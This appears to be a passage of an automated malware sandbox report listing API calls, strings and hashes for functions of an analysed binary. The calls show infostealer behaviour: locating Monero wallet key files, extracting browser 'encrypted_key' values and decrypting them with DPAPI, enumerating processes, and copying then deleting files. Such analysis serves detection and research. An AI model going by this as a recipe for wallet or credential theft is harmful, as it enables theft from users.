                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AD481
                  • lstrlen.KERNEL32(00000000), ref: 002AD698
                  • lstrlen.KERNEL32(00000000), ref: 002AD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 002AD72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: fc47b715b20d632dec514af5ae77404dbc9f49f43d158601a6abceb705f94416
                  • Instruction ID: 0f36c8e0868855550027f7ea47447a6c04599412e266b41b95c384573d37eeb4
                  • Opcode Fuzzy Hash: fc47b715b20d632dec514af5ae77404dbc9f49f43d158601a6abceb705f94416
                  • Instruction Fuzzy Hash: E1911571820108ABDB14FBA4DCA6EEE733CAF14340F504268F51776492EF346A29CF66
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002B8B60: GetSystemTime.KERNEL32(002C0E1A,00D5EC80,002C05AE,?,?,002A13F9,?,0000001A,002C0E1A,00000000,?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002B8B86
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002AD801
                  • lstrlen.KERNEL32(00000000), ref: 002AD99F
                  • lstrlen.KERNEL32(00000000), ref: 002AD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 002ADA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 573db38799f0c3c12f281f00471d22a1d45a4295bcc9de84e3e444ceb9804c39
                  • Instruction ID: 39eca7b0010a3264f7e21279c07a386cf7eb9a71ab59297571014e333bc5d19a
                  • Opcode Fuzzy Hash: 573db38799f0c3c12f281f00471d22a1d45a4295bcc9de84e3e444ceb9804c39
                  • Instruction Fuzzy Hash: 9B812471930108ABDB14FBA4DCA6EEE7338AF14340F504128F557B6492EF346A29DF62
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,002C1580,002C0D92), ref: 002AF54C
                  • lstrlen.KERNEL32(00000000), ref: 002AF56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 3ae1fd1843756246206daa3ebd13b0d82dd2dc2c8c3c56953acce09a8f12bf88
                  • Instruction ID: f44f3ed2cb4cb234e7a9ed5641daecbf7f12860e9cf5c7553e60cd51f599352e
                  • Opcode Fuzzy Hash: 3ae1fd1843756246206daa3ebd13b0d82dd2dc2c8c3c56953acce09a8f12bf88
                  • Instruction Fuzzy Hash: C951FF71D20108BBDB14FBA4DC96DED7378AF54340F408628F817A7591EE346A29CFA2
                  Strings
                  • s+, xrefs: 002B7111
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002B718C
                  • s+, xrefs: 002B72AE, 002B7179, 002B717C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: s+$s+$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-4043291952
                  • Opcode ID: 5dd45e8eec50772a3447317701771c80aeea1a5d820f185b4578a54e4431a040
                  • Instruction ID: dd6b618c17a653f71e23f392279c9f4293ece22b2274daff21d59b4e6f9dc44b
                  • Opcode Fuzzy Hash: 5dd45e8eec50772a3447317701771c80aeea1a5d820f185b4578a54e4431a040
                  • Instruction Fuzzy Hash: 4B517CB0D24219ABDB24EFA4DC85BEEB374AF44344F1041A8E61977181EF746E98CF64
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: df5adfc8cb2caa78d6e0e9bea24ec06df1c5bc2147e520d75ff2ed58f92f11e0
                  • Instruction ID: 207bd60b3ec0f3e72faa17b7a9c408e81d6f2ae94e8938f7838276b034928bde
                  • Opcode Fuzzy Hash: df5adfc8cb2caa78d6e0e9bea24ec06df1c5bc2147e520d75ff2ed58f92f11e0
                  • Instruction Fuzzy Hash: 414161B5D20109EBCB04EFE4D895EEEB778BF44344F008518E41676251DB74AA25CFA6
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002A9D39
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9AEF
                    • Part of subcall function 002A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002A4EEE,00000000,?), ref: 002A9B01
                    • Part of subcall function 002A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N*,00000000,00000000), ref: 002A9B2A
                    • Part of subcall function 002A9AC0: LocalFree.KERNEL32(?,?,?,?,002A4EEE,00000000,?), ref: 002A9B3F
                    • Part of subcall function 002A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002A9B84
                    • Part of subcall function 002A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 002A9BA3
                    • Part of subcall function 002A9B60: LocalFree.KERNEL32(?), ref: 002A9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: c4d533cf93f3a926d99b82668956bf237c7373d4b77337e12a732d6585bc3dbe
                  • Instruction ID: fafcb50264a9ae9929812c3680113f4e18ad1367d919d98cd5e3f62921862b33
                  • Opcode Fuzzy Hash: c4d533cf93f3a926d99b82668956bf237c7373d4b77337e12a732d6585bc3dbe
                  • Instruction Fuzzy Hash: 8A316575D20109ABCF04EFE5DC86EEFB7B8AF49304F144559E905A7241EB309A64CFA1
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002C05B7), ref: 002B86CA
                  • Process32First.KERNEL32(?,00000128), ref: 002B86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 002B86F3
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • CloseHandle.KERNEL32(?), ref: 002B8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: a5046558fa0a1e7535e1d7739eefa5101bd30be99f0f8af51903427872bfd587
                  • Instruction ID: adff08fb53dc11a3d50278bc8168cc0ac3d32e9c7c4417bee8a1bb0bbe175978
                  • Opcode Fuzzy Hash: a5046558fa0a1e7535e1d7739eefa5101bd30be99f0f8af51903427872bfd587
                  • Instruction Fuzzy Hash: DB316B71921218ABCB24EF90CC91FEEB778FF45740F1042A9E10AA61A0DF306A55CFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,002C0E00,00000000,?), ref: 002B79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,002C0E00,00000000,?), ref: 002B79C4
                  • wsprintfA.USER32 ref: 002B79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 585142c6d9c3f426cba56f1ebad3a4b1c7aa1c9727bd0f55592070574bc768ed
                  • Instruction ID: e90679d604acd28f882130a1afb1f65642d5d2e5dd11b70584e0495931bfd649
                  • Opcode Fuzzy Hash: 585142c6d9c3f426cba56f1ebad3a4b1c7aa1c9727bd0f55592070574bc768ed
                  • Instruction Fuzzy Hash: DD117CB2904158ABCB14DFD9DD84BBEB7F8FB4CB11F00411AF601A2280E3385950C7B5
                  APIs
                  • __getptd.LIBCMT ref: 002BC74E
                    • Part of subcall function 002BBF9F: __amsg_exit.LIBCMT ref: 002BBFAF
                  • __getptd.LIBCMT ref: 002BC765
                  • __amsg_exit.LIBCMT ref: 002BC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002BC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 0cea6d2d13f4fdeb93f33b6c2b207412bb799bf8ea31964420c7067c06f04243
                  • Instruction ID: 1cef15d742741c0b71d2c35ff7e3c0884853f4e63c758f0e4a7dc8dfbdd7e170
                  • Opcode Fuzzy Hash: 0cea6d2d13f4fdeb93f33b6c2b207412bb799bf8ea31964420c7067c06f04243
                  • Instruction Fuzzy Hash: 84F024329343009BD722BFB89807BEE73A06F047E0F304109F014A61D2CFA45870AE46
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4F7A
                  • lstrcat.KERNEL32(?,002C1070), ref: 002B4F97
                  • lstrcat.KERNEL32(?,00D58A08), ref: 002B4FAB
                  • lstrcat.KERNEL32(?,002C1074), ref: 002B4FBD
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B492C
                    • Part of subcall function 002B4910: FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                    • Part of subcall function 002B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                    • Part of subcall function 002B4910: FindClose.KERNEL32(000000FF), ref: 002B4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: f09b13343b3660b8d483a6fa8573c67a3cb531a669f9b0d3dbff8a7128f644d6
                  • Instruction ID: 7ad0fc32ecabadd2b9fcc0021032773f7e4515da0e6648759d5e9f0a2c890702
                  • Opcode Fuzzy Hash: f09b13343b3660b8d483a6fa8573c67a3cb531a669f9b0d3dbff8a7128f644d6
                  • Instruction Fuzzy Hash: 3321AA7A910208A7C754FBB0DCC7EED337CAB55300F404558B65996182EE74AAF8CFA6